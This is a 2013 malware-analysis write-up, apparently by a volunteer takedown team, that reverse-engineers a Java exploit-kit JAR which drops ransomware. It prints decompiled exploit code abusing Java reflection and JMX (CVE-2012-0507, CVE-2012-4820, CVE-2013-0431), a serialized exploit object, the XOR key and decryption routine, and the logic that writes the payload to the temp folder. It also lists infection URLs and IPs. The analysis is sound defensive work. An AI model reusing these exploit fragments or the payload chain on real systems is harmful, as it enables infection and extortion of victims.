Mistery of unknown EK using JAR exploit with Hidden Class & XOR-Encoded Embedded RansomWare
05 Apr 2013 This is the great teamwork, never be a personal work, I thank you the below wonderful team who helped the problem completely solved within 12hrs: @Cephurs @nyxbone @kahusecurity @a..om @essachin @rjacksix and @GloverDonovan + the rest of our friends who supported this missionWe had the active infectors is coming from the various urls as per below:
rootaliasx.biz/traff.htmlAnd we need to dismantle these domains ASAP.
dexthous.biz/traff.html
antestent.biz/hava.html
bastapils.biz/hava.html
bastapils.biz/traff.html
mzthtl.freewww.info/freeporn.html
ggooec.freewww.info/freeporn.html
ggooec.freewww.info/freeporn.html
zcmgiawwm.freewww.info/freeporn.html
asikdycf.wikaba.com/freeporn.html
hfncudbeu.wikaba.com/sextour.html
vjbgaz.freewww.info/freeporn.html
uekfnibe.wikaba.com/freeporn.html
bcmht.freewww.info/11111111.html
delphilol.biz/testo.html
xkshgc.wikaba.com/sextour.html
:
: (many more!)
So everything was in a hurry since Friday is to come soon.
[NEW] Quoted #Tango Dismantling Report Sat Apr 6 01:54:29 JST 2013:
==========================================================================
DOMAIN NAMES A RECORD NS SERVERS SUSPENSION STATUS
--------------------------------------------------------------------------
rootaliasx.biz,, IP DOWN NORTH.INAPPLE.COM SUSPENSION IN PROCESS
SOUTH.INAPPLE.COM
WEST.INAPPLE.COM
EAST.INAPPLE.COM
dexthous.biz,, IP DOWN NORTH.INAPPLE.COM SUSPENSION IN PROCESS
SOUTH.INAPPLE.COM
WEST.INAPPLE.COM
EAST.INAPPLE.COM
antestent.biz,, IP DOWN NORTH.INAPPLE.COM SUSPENSION IN PROCESS
SOUTH.INAPPLE.COM
WEST.INAPPLE.COM
EAST.INAPPLE.COM
bastapils.biz,, IP DOWN NORTH.INAPPLE.COM SUSPENSION IN PROCESS
SOUTH.INAPPLE.COM
WEST.INAPPLE.COM
EAST.INAPPLE.COM
bastapils.biz,, IP DOWN NORTH.INAPPLE.COM SUSPENSION IN PROCESS
SOUTH.INAPPLE.COM
WEST.INAPPLE.COM
EAST.INAPPLE.COM
delphilol.biz,, IP DOWN NORTH.INAPPLE.COM SUSPENSION IN PROCESS
SOUTH.INAPPLE.COM
WEST.INAPPLE.COM
EAST.INAPPLE.COM
mzthtl.freewww.info,, IP DOWN DNS DOWN SUSPENSION COMPLETE!
ggooec.freewww.info,, IP DOWN DNS DOWN SUSPENSION COMPLETE!
zcmgiawwm.freewww.info,, IP DOWN DNS DOWN SUSPENSION COMPLETE!
asikdycf.wikaba.com,, IP DOWN DNS DOWN SUSPENSION COMPLETE!
hfncudbeu.wikaba.com,, IP DOWN DNS DOWN SUSPENSION COMPLETE!
vjbgaz.freewww.info,, IP DOWN DNS DOWN SUSPENSION COMPLETE!
uekfnibe.wikaba.com,, IP DOWN DNS DOWN SUSPENSION COMPLETE!
bcmht.freewww.info,, IP DOWN DNS DOWN SUSPENSION COMPLETE!
xkshgc.wikaba.com,, IP DOWN DNS DOWN SUSPENSION COMPLETE!
: : : :
It is an Exploit Kit with the panel below:
(* In the end we were informed by @kafaine it's a RedDorv2 Exploit Kit)
The landing page infector contains the HTML like:To understand the flow we must reverse it and to understand the decryption goes. We much think backward, start with the lower step of obfuscation and build things up. The most obfuscation is mainly using K.Class. @Cephurs was recognizing it right away with the ROT13 logic while I was so dumb to start on XOR parts (Thank's friend!)--2013-04-05 10:50:54-- h00p://rootaliasx.biz/traff.htmlWith the HTML code : As per coded it lead to the JAR file:
Resolving rootaliasx.biz... seconds 0.00, 46.4.179.111
Caching rootaliasx.biz => 46.4.179.111
Connecting to rootaliasx.biz|46.4.179.111|:80... seconds 0.00, connected.
GET /traff.html HTTP/1.0
Host: rootaliasx.biz
Connection: Keep-Alive
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 05 Apr 2013 05:20:55 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.23
Cache-Control: no-store, no-cache
Expires: Fri, 05 Apr 2013 05:20:27 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 551
:
200 OK
Length: 551 [text/html]
Saving to: `traff.html'
2013-04-05 10:50:56 (36.4 MB/s) - `traff.html' saved [551/551]--2013-04-04 14:40:45-- h00p://rootaliasx.biz/traff.jarIP involved in the infection: ↑All IPs are in HELZNER Germany Network. Under below registrant:
Resolving rootaliasx.biz... seconds 0.00, 46.4.179.111
Caching rootaliasx.biz => 46.4.179.111
Connecting to rootaliasx.biz|46.4.179.111|:80... seconds 0.00, connected.
:
GET /traff.jar HTTP/1.0
Host: rootaliasx.biz
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 04 Apr 2013 09:10:45 GMT
Content-Type: application/java-archive
Connection: keep-alive
X-Powered-By: PHP/5.3.23
Content-Disposition: attachment; filename="traff.jar"
Content-Length: 63706
Cache-Control: no-store, no-cache
Expires: Thu, 04 Apr 2013 09:10:17 GMT
Vary: Accept-Encoding,User-Agent
:
200 OK
Length: 63706 (62K) [application/java-archive]
Saving to: `traff.jar'
2013-04-04 14:40:53 (8.32 KB/s) - `traff.jar' saved [63706/63706]inetnum: 46.4.179.64 - 46.4.179.127
netname: VPSSERVER
descr: vpsserver
country: DE
admin-c: VK1952-RIPE
tech-c: VK1952-RIPE
status: ASSIGNED PA
mnt-by: HOS-GUN
source: RIPE Filtered"
person: Viacheslav Krivosheev
address: vps-server
address: Poliykovskaiy 8a
address: 153011 IVANOVO
address: RUSSIAN FEDERATION"
phone: +79106677787
fax-no: +74932502950
nic-hdl: VK1952-RIPE
mnt-by: HOS-GUN
source: RIPE # FilteredJAR File Details: (Thanks to VT for the format)
SHA1: f8e433a2190017d9bd866374d6adfc124409e83eSome pcaps..& more evidence: Is the multiple class of Java archive executable, contains embedded object. The traff.jar classes is having components as follows:
MD5: 8a928628fa5d3e43db4ca1ae6d0213b6
File size: 62.2 KB ( 63705 bytes )
File name: traff.jar
File type: JARI: System environment sniffer
C: The main class to be called from landing page
D: Contains hidden W.class and XOR logic with its key
K: String translation + cascaded with char rotator logic obfuscatoin
S: Embedded object extractor logic, used same key as XOR
A: Has some exploit methods/codes with some obfuscation.
TRAFF: An embedded object trailed at the bottom (in HEX)
To make it simple it was rotating the chars with below logic in Java:Varied of exploitation methods and code detected, mainly is aimed the abuse of getMethod invoke(), combined with loading JmxMBeanServer's components. It is aiming for Java version 1.7. I tried to infect myself with 1.6.x and ended up with crash:public static String rot13(String paramString)Which is resulting in rotation character below:
{
String str = "";
int i = 13;
for (int j = 0; j < paramString.length(); j++)
{
char c = paramString.charAt(j);
if ((c >= 'a') && (c <= 'm')) c = (char)(c + i);
else if ((c >= 'A') && (c <= 'M')) c = (char)(c + i);
else if ((c >= 'n') && (c <= 'z')) c = (char)(c - i);
else if ((c >= 'N') && (c <= 'Z')) c = (char)(c - i);
str = str + c;
}
return str;
}ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzAnd all of the strings in K.Class can be converted into below table:
NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklmwnin.frphevgl.preg.Pregvsvpngr java.security.cert.CertificateFor the table picture is here: See the long var "aced...blah blah" string? Is actually a Java class with the insides is CVE-2012-0507 code↓
wnin.frphevgl.PbqrFbhepr java.security.CodeSource
wnin.frphevgl.Crezvffvbaf java.security.Permissions
svyr: file:
frg set
fha.bet.zbmvyyn.wninfpevcg.vagreany.Pbagrkg sun.org.mozilla.javascript.internal.Context
pbz.fha.wzk.zornafreire.ZOrnaVafgnagvngbe com.sun.jmx.mbeanserver.MBeanInstantiator
H U
cbejAXOIiDNOD porwNKBVvQABQ
1.7 1.7
wnin.vb.gzcqve java.io.tmpdir
svaqPynff findClass
jimVfWd.rkr wvzIsJq.exe
bf.anzr os.name
wnink.znantrzrag.ZOrnaFreire javax.management.MBeanServer
cbejAXOIiDNOD porwNKBVvQABQ
arjZOrnaFreire newMBeanServer
pbz.fha.wzk.zornafreire.Vagebfcrpgbe com.sun.jmx.mbeanserver.Introspector
Jvaqbjf Windows
wnin.vb.gzcqve java.io.tmpdir
wnin.frphevgl.NyyCrezvffvba java.security.AllPermission
wnink.znantrzrag.ZOrnaFreireQryrtngr javax.management.MBeanServerDelegate
I V
C P
tnzr.J game.W
ryrzragSebzPbzcyrk elementFromComplex
cbejAXOIiDNOD porwNKBVvQABQ
wnin.frphevgl.CebgrpgvbaQbznva java.security.ProtectionDomain
GGSPg.rkr TTFCt.exe
fha.bet.zbmvyyn.wninfpevcg.vagreany.TrarengrqPynffYbnqre sun.org.mozilla.javascript.internal.GeneratedClassLoader
wnin.frphevgl.CrezvffvbaPbyyrpgvba java.security.PermissionCollection
wnin.irefvba java.version
pbz.fha.wzk.zornafreire.WzkZOrnaFreire com.sun.jmx.mbeanserver.JmxMBeanServer
trgZOrnaVafgnagvngbe getMBeanInstantiator
nqq add
nprq0005757200135o4p6n6176612r6p616r672r4s626n6563743o90pr aced0005757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c020000787000000002757200095b4c67616d652e413bfe2c941188b6e5ff02000078700000000170737200306a6176612e7574696c2e636f6e63757272656e742e61746f6d69632e41746f6d69635265666572656e63654172726179a9d2dea1be65600c0200015b000561727261797400135b4c6a6176612f6c616e672f4f626a6563743b787071007e0003
cbejAXOIiDNOD porwNKBVvQABQ
qrpynerqZrgubqf declaredMethods
wnin.frphevgl.Crezvffvba java.security.Permission0000 AC ED 00 05 75 72 00 13 5B 4C 6A 61 76 61 2E 6C ....ur..[Ljava.lOK, we got the table. What's next?
0010 61 6E 67 2E 4F 62 6A 65 63 74 3B 90 CE 58 9F 10 ang.Object;..X..
0020 73 29 6C 02 00 00 78 70 00 00 00 02 75 72 00 09 s)l...xp....ur..
0030 5B 4C 67 61 6D 65 2E 41 3B FE 2C 94 11 88 B6 E5 [Lgame.A;.,.....
0040 FF 02 00 00 78 70 00 00 00 01 70 73 72 00 30 6A ....xp....psr.0j
0050 61 76 61 2E 75 74 69 6C 2E 63 6F 6E 63 75 72 72 ava.util.concurr
0060 65 6E 74 2E 61 74 6F 6D 69 63 2E 41 74 6F 6D 69 ent.atomic.Atomi
0070 63 52 65 66 65 72 65 6E 63 65 41 72 72 61 79 A9 cReferenceArray.
0080 D2 DE A1 BE 65 60 0C 02 00 01 5B 00 05 61 72 72 ....e`....[..arr
0090 61 79 74 00 13 5B 4C 6A 61 76 61 2F 6C 61 6E 67 ayt..[Ljava/lang
00A0 2F 4F 62 6A 65 63 74 3B 78 70 71 00 7E 00 03 /Object;xpq.~..Unlocked encoding logic
Put all K.class vars in the rest of the classes variables & that will make you understand the exploitation use completely: In I class it detects OS Name and Java Versions:(9): String str1 = System.getProperty(K.BvKs70); /// System.getProperty(os.name);In A class :
(24): String str8 = System.getProperty(K.sATQ); /// System.getProperty(java.version);
(32): String str10 = getParameter(K.JgUQEqm); /// getParameter(U);
(40): String str14 = getParameter(K.HS0g); /// getParameter(V);
And also IMPORTANT condition of infection (main windows + Java >= 1.7)
(58): (str1.indexOf(K.jp1jj) >= 0) // if (str1.indexOf(Windows) >= 0)
(83): if (str8.startsWith(K.adxAi3j)) // if (str8.startsWith(1.7))(27): URL localURL = new URL(K.F5vzTsGa + "//"); → URL localURL = new URL("file:" + "//");In C Class:
(43): Class localClass1 = Class.forName(K.zDCn9Y); → Class localClass1 = Class.forName("java.security.cert.Certificate");
(68): Class localClass2 = Class.forName(K.dy3rkh); → Class localClass2 = Class.forName("java.security.Permissions");
(86): Class localClass3 = Class.forName(K.hkhQ5O); → Class localClass3 = Class.forName("java.security.Permissions");
(98): Method localMethod = localClass2.getMethod(K.Url1a, new Class[] { localClass3 }); → K.Url1a == "add"
(100): localMethod.invoke(localObject2, new Object[] { Class.forName(K.ZklLSir).newInstance() }); → K.ZklLSir == "java.security.AllPermission"
(113): Class localClass4 = Class.forName(K.tmc3I); → "java.security.ProtectionDomain"
(117): Class localClass5 = Class.forName(K.SNku); → "java.security.Permissions"
(133): Class localClass6 = Class.forName(K.uKIX_p); → "java.security.PermissionCollection"
(195): Class localClass7 = paramA.defineClass(K.Jb928E, D.decoded, 0, i104, (ProtectionDomain)localObject4); // "game.W"
(211): String str49 = System.getProperty(K.p6BEDfqv); → "java.io.tmpdir"
(218): String str51 = "\\" + K.JuUKXjj; → "TTFCt.exe"
(263): localConstructor3.newInstance(new Object[] { paramString1, paramString2, paramString3, "0", str49 + str51, S.class.getClassLoader().getResourceAsStream(paramString3), K.PH8cd4 });
→ "porwNKBVvQABQ"(73): ObjectInputStream localObjectInputStream = new ObjectInputStream(new ByteArrayInputStream(X(K.TvUD3yH4)));↑This will getting the binary stream CVE-2012-0507 to be loaded. because the :K.TvUD3yH4 = "aced000575...(snipped)...f626a6563743b787"And..(96): localObject[1].getClass().getMethod(K.I4VwpS8, new Class[] { Integer.TYPE, Object.class }).invoke(localObject[1], new Object[] { Integer.valueOf(0), getClass().getClassLoader() });This is the abuse of the getMethod of - java.lang.reflect.Method invoke() method CVE-2012-4820 In the K Class, let's see what bad actors tried to hide: javax.management.MBeanServer was imported as per encoded:
→ K.I4VwpS8 == "set"(128): public static String uuIj = new String(rot13("wnink.znantrzrag.ZOrnaFreire"));com.sun.jmx.mbeanserver.Introspector was imported as per encoded:
(301): public static String ZyZhnh5a = new String(rot13("pbz.fha.wzk.zornafreire.WzkZOrnaFreire"));(62): public static String Qj7BnL = new String(rot13("pbz.fha.wzk.zornafreire.ZOrnaVafgnagvngbe"));and javax.management.MBeanServerDelegate:
(148): public static String dradg2 = new String(rot13("pbz.fha.wzk.zornafreire.Vagebfcrpgbe"));(182): public static String i_fJGSy = new String(rot13("wnink.znantrzrag.ZOrnaFreireQryrtngr"));In the S class was written:(14): Class localClass = Class.forName(K.dradg2); // Class localClass = Class.forName(com.sun.jmx.mbeanserver.Introspector);which is actually means:
(17): Method localMethod1 = localClass.getMethod(K.vpAhSF, new Class[] { Object.class, String.class });
(20): Method[] arrayOfMethod1 = (Method[])(Method[])localMethod1.invoke(null, new Object[] { paramObject, K.uATab_ });
(103): Class localClass1 = Class.forName(K.ZyZhnh5a);
(118): Method localMethod1 = localClass1.getMethod(K.CqAw, new Class[] { String.class, Class.forName(K.uuIj), Class.forName(K.i_fJGSy), Boolean.TYPE });
(139): Class localClass2 = Class.forName(K.Qj7BnL);
(149): Method localMethod2 = localClass1.getMethod(K.n7tOG, new Class[0]);
(173): Method localMethod3 = localClass2.getMethod(K.lKCeXn, new Class[] { String.class, ClassLoader.class });
(188): Class localClass1 = fItgag(K.Mg7ws1);
(226): Class localClass2 = fItgag(K.YoILBY);
(262): String str27 = System.getProperty(K.aPd5);
(269): String str30 = "\\" + K.H95l4;
(311): localConstructor.newInstance(new Object[] { paramString1, paramString2, paramString3, "1", str27 + str30, S.class.getClassLoader().getResourceAsStream(paramString3), K.F8pYg2tfr });(14): Class localClass = Class.forName(com.sun.jmx.mbeanserver.Introspector);OK, we have all codes decoded, we can read all codes now! Good, first let's see if we can recognize the exploitation used..
(17): Method localMethod1 = localClass.getMethod(elementFromComplex, new Class[] { Object.class, String.class });
(20): Method[] arrayOfMethod1 = (Method[])(Method[])localMethod1.invoke(null, new Object[] { paramObject, declaredMethods });
(103): Class localClass1 = Class.forName(com.sun.jmx.mbeanserver.JmxMBeanServer);
(118): Method localMethod1 = localClass1.getMethod(K.CqAw, new Class[] { String.class, Class.forName(K.uuIj), Class.forName(javax.management.MBeanServerDelegate), Boolean.TYPE });
(139): Class localClass2 = Class.forName(com.sun.jmx.mbeanserver.Introspector);
(149): Method localMethod2 = localClass1.getMethod(getMBeanInstantiator, new Class[0]);
(173): Method localMethod3 = localClass2.getMethod(findClass, new Class[] { String.class, ClassLoader.class });
(188): Class localClass1 = fItgag(sun.org.mozilla.javascript.internal.Context);
(226): Class localClass2 = fItgag(sun.org.mozilla.javascript.internal.GeneratedClassLoade);
(262): String str27 = System.getProperty(java.io.tmpdir);
(269): String str30 = "\\" + "wvzIsJq.exe";
(311): localConstructor.newInstance(new Object[] { paramString1, paramString2, paramString3, "1", str27 + str30, S.class.getClassLoader().getResourceAsStream(paramString3), porwNKBVvQABQ });Exploitation
This case is interesting. Because we see two ways gain the payload here, just grep the .exe in the above decoded classes code and you'll get:
Shortly. These are the list of exploitation(CVE/CWE) method I can spot:CVE-2012-4820: java.lang.reflect.Method invoke() method
CWE-578: EJB Bad Practices use of Class Loader
CVE-2012-0507 Java AtomicReferenceArray Type Violation
CVE-2013-0431 Getting access to restricted classes (via com.sun.jmx.mbeanserver.MBeanInstantiator)Payload
A.class with payload: "TTFCt.exe"
S.class with the payload: "wvzIsJq.exe"
First route to payload...
Payload was coded to be defined by the below code as a class. Is it really a class?
Class localClass7 = paramA.defineClass("game.W",Which is the Game.W doesn't exist in the classes list!
D.decoded, 0, i104,
(ProtectionDomain)localObject4);
So there is a hidden class in D.Class with"decoded"function.
:-) ↓We can see the decoded XOR key used...
public static byte[] decoded = XorDecrypt(encoded, "porwNKBVvQABQ");。。to decrypt this array in D Class.. (Which I assumed it was an encoded shellcode in quick analysis)
public static byte[] encoded = { -70, -111, -..To make it clear.. a pic :-)↓ ↑This Array was loaded by the below loading-logic loops:
.., 35, 89, 65, 20, 86, 112, 56, 120, 119, 22, ..
..5, 89, 81, 58, 101, 114, 84, 78, 1, 69, 86, 6..
... 29, 47, 61, 35, 121, 31, 62, 110, 11, 63, 0,..
...3, 48, 56, 30, 8, 73, 94, 2, 33, 35, 32, 23, ..
... 0, 48, 110, 46, 48, 30, 8, 93, 36, 58, 57, 4..
..., 16, 97, 24, 54, 36, 31, 63, 38, 121, 120, 3..
...4, 80, 65, 90, 59, 17, 25, 19, 88, 39, 36, 10..
... 112, -24, 114, -2, 66, 75, -56, 86, -3, 80, ..
public static byte[] XorDecrypt(byte[] paramArrayOfByte, String paramString)Into paramArrayOfByte to be soted in to localObject4, which having definition object below: (trailed it↓)
{ int i = 0; for (int j = 0; i < paramArrayOfByte.length; j = (j + 1) % paramString.length())
{ int tmp12_11 = i; paramArrayOfByte[tmp12_11] = (byte)(paramArrayOfByte[tmp12_11]
^ paramString.charAt(j));
↓localObject4 = localConstructor1.newInstance(new Object[] { localObject3, localObject2 });↑Yes, the code will treat the object as a Java class after you XOR the array.
↓localObject3 = localConstructor2.newInstance(new Object[] { localURL, localObject1 });
↓localObject2 = localMethod1.invoke(null, new Object[] { "", null, null, Boolean.valueOf(true) });
localObject1 = Array.newInstance(localClass1, 0)
This class will extract TRAFF embedded file & save it with file://TTFCt.exe.
While I was on decoding the vars , Daryll of Kahu Security was successfully extracted this 1st. :-) So you'd better also read Kahu Security good post about extracting EXE payload file saved from this. Here is the Kahu Security post's link-->>[HERE]
:-))) OK. End of the first method.
This is the second route of getting the binary payload. Let's see it further, now, what is inside of the TRAFF embedded object? A binary? Another Class?
Second route to payload, a bypass :-)
We detected 31KB Object "traff" is a encoded exe embedded in jar:
-rwxr--r-- 1 MMD toor 31232 Apr 3 22:44 "traff"*looks like this encoded data:
0000 3D 35 F2 77 4F 4B 42 56 72 51 51 42 AE 8F 6F 72 =5.wOKBVrQQB..orTo be clear.. a Pic :-)↓ ↑Can you see the XOR pattern? :D
0010 37 4F 4B 42 56 76 51 41 02 51 70 6F 72 77 4E 4B 7OKBVvQA.QporwNK
0020 42 56 76 51 41 42 51 70 6F 72 77 4E 4B 42 56 76 BVvQABQporwNKBVv
0030 51 41 42 51 70 6F 72 77 4E 4B 42 56 F6 51 41 42 QABQporwNKBV.QAB
0040 5F 6F D5 7C 77 FA 42 8F 77 CE 50 0D 8F 70 24 07 _o.|w.B.w.P..p$.
0050 1B 04 6E 3B 30 39 11 23 20 2F 71 13 0E 1C 19 21 ..n;09.# /q....!
0060 3F 62 34 13 71 33 37 3F 50 06 1C 57 0A 04 11 76 ?b4.q37?P..W...v
0070 1B 3E 25 27 7F 7D 65 56 77 4E 4B 42 56 76 51 41 .>%'.}eVwNKBVvQA
0080 12 14 70 6F 3E 76 4B 4B 45 62 2A 00 41 42 51 70 ..po>vKKEb*.ABQp
0090 6F 72 77 4E AB 42 58 77 5A 40 43 16 70 6D 72 77 [email protected]
: : :
7820 05 46 08 71 27 61 F1 5F F4 47 C0 7B D5 66 E9 61 .F.q’a._.G.{.f.a
7830 E4 72 E1 40 D9 42 C8 7E 8E 72 9C 46 81 71 98 61 [email protected].~.r.F.q.a
7840 99 5F 64 46 7D 7A 1D 67 08 60 C6 73 F7 41 D9 43 ._dF}z.g.’.s.A.C
7850 92 7F A6 73 56 76 51 41 42 51 70 6F 72 77 4E 4B ...sVvQABQporwNK
7860 42 56 76 51 41 42 51 70 6F 72 77 4E 4B 42 56 76 BVvQABQporwNKBVv
7870 51 41 42 51 70 6F 72 77 4E 4B 42 56 76 51 41 42 QABQporwNKBVvQAB
7880 51 70 6F 72 77 4E 4B 42 56 76 51 41 42 51 70 6F QporwNKBVvQABQpo
: : :
7990 42 51 70 6F 72 77 4E 4B 42 56 76 51 41 42 51 70 BQporwNKBVvQABQp
79A0 6F 72 77 4E 4B 42 56 76 51 41 42 51 70 6F 72 77 orwNKBVvQABQporw
79B0 4E 4B 42 56 76 51 41 42 51 70 6F 72 77 4E 4B 42 NKBVvQABQporwNKB
79C0 56 76 51 41 42 51 70 6F 72 77 4E 4B 42 56 76 51 VvQABQporwNKBVvQ
79D0 41 42 51 70 6F 72 77 4E 4B 42 56 76 51 41 42 51 ABQporwNKBVvQABQ
79E0 70 6F 72 77 4E 4B 42 56 76 51 41 42 51 70 6F 72 porwNKBVvQABQpor
79F0 77 4E 4B 42 56 76 51 41 42 51 70 6F 72 77 4E 4B wNKBVvQABQporwNK
Yes, but we should confirm XOR key which is supposed in the hidden W.class..back to the the D.class...
But wait!! there is another clue! In the decoded code in S.Class, it was mentioned "again":
localClass3 = (Class)localMethod3.invoke(localObject2, new Object[] { null, D.decoded });If we trail it further we found that the same XOR key"porwNKBVvQABQ" is used. Strange! This is suggesting the automation scheme in this Exploit Kit in obfuscating any of the payload embedded with XOR. See the XOR key in the end of string below↓
(311): localConstructor.newInstance(new Object[] { paramString1, paramString2, paramString3, "1", str27 + str30, S.class.getClassLoader().getResourceAsStream(paramString3), porwNKBVvQABQ });Traced it more to come up with loading of new object to drop a file:
str27 = System.getProperty(java.io.tmpdir);So this could be it, jumped to FreeBSD shell to XOR the TRAFF "porwNKBVvQABQ" key
str30 = "\\" + "wvzIsJq.exe";
$ myxorwraper.py -l 13 -k porwNKBVvQABQ ./traffThat's the XOR result. ↓Here's that PE Infor:
./20130405100541.out
$ ls -alF 20130405100541.out
"-rwxr--r-- 1 xxx xxx 31232 Apr 5 19:06 20130405100541.out*"
Exif++:Looks like I bumped into @rjacksix's uploaded sample in VT ;-) URL-->>[HERE]
MIMEType : application/octet-stream
Subsystem : Windows GUI
MachineType : Intel 386 or later, and compatibles
TimeStamp : 2013:04:03 14:52:07+01:00
CompileTime : 2013-04-03 13:52:07
FileType : Win32 EXE
PEType : PE32
CodeSize : 512
LinkerVersion : 1.71
InitializedDataSize : 29696
SubsystemVersion : 4.0
ImageVersion : 0.0
OSVersion : 1.0
UninitializedDataSize : 0
Sections:
.code 0x1000 0x1fa 512
.data 0x2000 0x6d3c 28160
.edata 0x9000 0x50 512
.idata 0xa000 0x1d4 512
.reloc 0xb000 0x54 512
Entry Point at 0x400
Virtual Address is 0x401000
:
0000 4D 5A 80 00 01 00 00 00 04 00 10 00 FF FF 00 00 MZ..............
0010 40 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 @.......@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
0070 6D 6F 64 65 2E 0D 0A 24 00 00 00 00 00 00 00 00 mode...$........
0080 50 45 00 00 4C 01 05 00 07 34 5C 51 00 00 00 00 PE..L....4.Q....
SHA256: bab60825b4e25ecbe42981514b3854451eeb542b2bf7efdf65c1dac1d1b47b2d↑here we are, a Ransomware. See tweet by @nyxbone:
SHA1: 8c9f66d79f2b798cc655612af41d51ed53c9f222
MD5: 2a933a291f92e2a257c5cb0875b227a2
File size: 30.5 KB ( 31232 bytes )
File name: 2a933a291f92e2a257c5cb0875b227a2.exe
File type: Win32 EXE
Tags: peexe
Detection ratio: 5 / 46
Analysis date: 2013-04-04 17:06:37 UTC ( 17 hours, 6 minutes ago )
Malware names;
Panda : Trj/Dtcontx.C
Symantec : WS.Reputation.1
CAT-QuickHeal : (Suspicious) - DNAScan
Kaspersky : Trojan-Ransom.Win32.Foreign.bdjg
Microsoft : Trojan:Win32/Urausy.D
Please block all url and of the IP mentioned above.@malwaremustdie I found this LockScreen in a lot of .ru domains with IPs 134.0.116.18, 62.122.213.10, 77.246.149.33 twitter.com/nyxbone/status…
— Mosh (@nyxbone) April 5, 2013
In my test cases before infecting & crash my PC is sent DNS request to the host below:
↑It requesting A record to callback to domain testodrom.biz
you can see right before crash the malform packet was generated..
If you got infected by this ransomware you'll find these files in %AppData% and some changes in registry pointing autostart of these "AltShell". These are the self-copied of the payload, and to be executed by shell environment.
Kudoz! MalwareMustDie Team!
#MalwareMustDie MOAR Ransomware at 46.4.179.118 (thx:@nyxbone) pastebin.com/raw.php?i=SpaJ… VT=2/46 virustotal.com/en/file/cc7d71… twitter.com/MalwareMustDie…
— Malware Crusaders (@MalwareMustDie) April 7, 2013
@malwaremustdie wt4n6.com/CuckooResults/…
— Robin Jackson (@rjacksix) April 5, 2013
Quick note to "wack" the bins...
Oh MAI.. blocked by pastebin "AGAIN"... (why me.. why now..why!!!) #crusadeistough
— Malware Crusaders (@MalwareMustDie) April 4, 2013
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzNOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm
— WT4N6 (@Cephurs) April 4, 2013
@malwaremustdie good work friends . expect a #tangodown its gonna be huge
— sachin (@essachin) April 4, 2013
Thank's to @kafeine for informing EK info;@malwaremustdie @cephurs Looking at the encoded and decoded java, I assume there was a "letter-shifting" cipher involved? (e.g: A->C, B->D)
— Donovan Glover (@GloverDonovan) April 5, 2013
@malwaremustdie twitter.com/kafeine/status…Seems to share a huge amount of things with RedDot.Not knowing we @ekwatcher @node5use Reddotv2
— kafeine (@kafeine) April 5, 2013
The quick analysis I made is linked here-->>[HERE]
(Used Google drive because pastebin blocked me "again" somehow)
I realized that the-2hours-made quick (halfway) analysis information is incorrect and rough in some points, so please refer to this post for the valid information, with thank you for be patient with us solving difficult case.
Samples
We shared the samples for the research & raising detection ratio:
Download is here-->>[HERE]
#MalwareMustDie!